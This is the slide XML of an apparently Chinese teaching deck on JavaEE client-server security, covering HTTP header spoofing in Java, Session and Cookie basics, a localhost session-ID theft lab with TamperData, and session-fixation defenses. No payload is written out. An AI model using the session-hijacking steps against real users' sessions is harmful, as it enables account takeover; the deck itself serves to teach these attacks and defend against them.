          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2334895" y="1146175"/>
            <a:ext cx="6228715" cy="3314065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>就这点危害吗？？？？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>使用Moify Headers自定义的修改Headers:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="951230" y="2338705"/>
            <a:ext cx="6924040" cy="2305050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>就这点危害吗？？？？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>使用Moify Headers自定义的修改Headers:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031240" y="2757805"/>
            <a:ext cx="5581015" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>就这点危害吗？？？？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>Demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Discuz、xss.tw</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031240" y="2757805"/>
            <a:ext cx="5581015" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>Java里面伪造Http请求头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>URL realUrl = new URL(url);</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>URLConnection connection = realUrl.openConnection();</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>connection.setConnectTimeout(5000);//连接超时</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>connection.setReadTimeout(5000);// 读取超时</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>connection.setRequestProperty("accept", "*/*");</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>connection.setRequestProperty("connection", "Keep-Alive");</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>(………………………..)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3357880" y="667385"/>
            <a:ext cx="4999990" cy="3809365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133475" y="647700"/>
            <a:ext cx="6876415" cy="384746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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t> Session</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Session是存储于服务器内存当中的会话，我们知道Http是无状态</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>协议，为了支持客户端与服务器之间的交互，我们就需要通过不同</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>的技术为交互存储状态，而这些不同的技术就是Cookie和Session</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>了。</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>session.setAttribute("name",name);</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>//从请求中获取用户的name放到session当中</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>session.setAttribute("ip",request.getRemoteAddr());</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>//获取用户请求Ip地址</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>out.println("Session 设置成功.");</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3743325" y="1813560"/>
            <a:ext cx="4971415" cy="229552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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JavaEE 基础</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>JSP: 全名为java server page，其根本是一个简化的Servlet。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Servlet：Servlet是一种服务器端的Java应用程序，可以生成动态的Web页面。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>JavaEE: JavaEE是J2EE新的名称。改名目的是让大家清楚J2EE只是Java企业应用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一图抵千言</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2423160" y="714375"/>
            <a:ext cx="6152515" cy="366649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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t> Session</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976755" y="878840"/>
            <a:ext cx="6091555" cy="4029075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Session 生命周期(从创建到销毁)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>1、session的默认过期时间是30分钟，可修改的最大时间是1440</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>分钟（1440除以60=24小时=1天）。</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>2、服务器重启或关闭Session失效</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000"/>
              <a:t>如果我浏览器关了。。。。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>还在不？？？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>SessionId是神马？有什么用？</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>来做一个偷取sessionId的实验： 首先访问：</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>http://localhost/Test/SessionTest?action=setSession&amp;name=</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>selina 完成session的创建，如何建立就不解释了如上所述。</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>同时开启FireFox和Chrome浏览器设置两个Session：  ￼    </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="2783205"/>
            <a:ext cx="7019290" cy="1990725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>看下当前用户的请求头分别是怎样的：      </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1504950"/>
            <a:ext cx="7085965" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>用TamperData来修改请求的Cookie当中的jsessionId，下面是见</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>证奇迹的时刻：      </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1467485"/>
            <a:ext cx="7076440" cy="3475990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>如何应对SessionFixation攻击 </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>1、用户输入正确的凭据，系统验证用户并完成登录，并建立新的</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>会话ID。</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>2、Session会话加Ip控制 </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>3、加强程序员的防范意识：写出明显xss的程序员记过一次，写出</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>隐晦的xss的程序员警告教育一次，连续查出存在3个及其以上xss</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>的程序员理解解除劳动合同(哈哈，开玩笑了)。     </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Cookie是以文件形式[缓存在客户端]的凭证(精简下为了通俗易懂)，</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>cookie的生命周期主要在于服务器给设置的有效时间。如果不设</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>置过期时间，则表示这个cookie生命周期为浏览器会话期间，只</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>要关闭浏览器窗口，cookie就消失了。     </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>创建一个Cookie： </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
